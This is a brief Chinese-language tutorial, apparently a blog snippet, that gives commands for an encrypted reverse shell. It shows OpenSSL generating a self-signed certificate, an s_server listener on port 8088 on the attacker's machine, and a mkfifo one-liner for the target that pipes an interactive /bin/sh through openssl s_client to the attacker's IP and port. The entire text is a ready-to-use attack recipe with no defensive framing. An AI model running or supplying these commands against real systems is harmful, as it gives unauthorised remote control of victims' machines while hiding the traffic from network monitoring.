1、在攻击机上使用OpenssL生成证书

1
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes

开启监听。

1
openssl s_server -quiet -key key.pem -cert cert.pem -port 8088

2、目标机上执行命令

1
mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 攻击机IP:端口> /tmp/s; rm /tmp/s